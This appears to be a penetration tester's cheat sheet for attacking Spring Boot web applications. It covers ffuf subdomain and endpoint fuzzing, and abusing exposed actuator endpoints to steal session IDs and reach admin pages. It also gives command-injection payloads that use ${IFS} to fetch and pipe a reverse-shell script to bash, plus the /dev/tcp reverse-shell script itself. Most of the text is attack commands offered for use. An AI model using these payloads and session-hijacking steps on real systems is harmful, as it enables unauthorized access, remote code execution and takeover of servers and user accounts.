- robots.txt
- sitemap.xml
# Command : ffuf -w <wordlist> -u http://<host>.fr/ -H 'Host: FUZZ.<host>.fr' -fs 15949
ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/bitquark-subdomainstop100000.txt -u http://mywebsite.fr/ -H 'Host: FUZZ.mywebsite.fr' -fs 15949
Check a random page that does not exist as example /qmdkgjrot12dfgg. If the error page return "WhiteLabel Error Page", it's means that the Spring Boot framework is used.
| endpoint | Description |
|---|---|
| /actuator | |
| /actuator/sessions | List all the active sessions and their session ids |
| /actuator/beans | |
| /actuator/health | |
| /actuator/env | |
| /actuator/mappings | This provides a detailed overview of all the mappings configured in the application. On browsing to the endpoint, we see a JSON response containing information about the request mappings in place, including the requests' methods (GET,POST,etc.) |
known specific wordlist : /usr/share/wordlists/SecLists/Discovery/Web-Content/spring-boot.txt
ffuf -w /usr/share/wordlists/SecLists/Discovery/Web-Content/spring-boot.txt:FFUZ -u http://mywebsite.com/FFUZ -ic -t 10
We see the session identifier, which we can grab and set as a cookie in our browser, using the developer console's Storage tab.
Important note: Sometimes firefox does not allow to add directly in cookies session, consequently, try to add into local storage or session storage. In addition, think to rename the name into JSESSIONID.
Once the session identifier add, try to access to the authenticated user or admin webpags (e.g. /admin, /console, etc.).
Important note: Sometimes the session identifier is expired. In this case, reload the /actuator/sessions page, take a new session identifier then modify it into the developer console's storage tab.
Often the field does not accept white spaces, so to bypass this we can use ${IFS} as a delimiter, which is a special shell variable that stands for Internal Field Separator and defaults to a space (followed by a tab and a newline) in shells like Bash and sh.
Example of command injection using ${IFS} as a delimiter.
#Think to execute 'python -m http.server 4444' on the attacker side before
test;curl${IFS}http://10.0.0.1:4444; => try to acconect to the attacker server
test;curl${IFS}http://10.10.0.1:4444/reverse.sh|bash; => try to connect to the attacker server, donwload a reverse shell (reverse.sh) then execute it using bash.
#Example of revershe shell generation in the shell
#echo -e '#!/bin/bash\nsh -i >& /dev/tcp/<local-ip>/<local-port> 0>&1' > reverse.sh
echo -e '#!/bin/bash\nsh -i >& /dev/tcp/10.0.0.1/4449 0>&1' > reverse.sh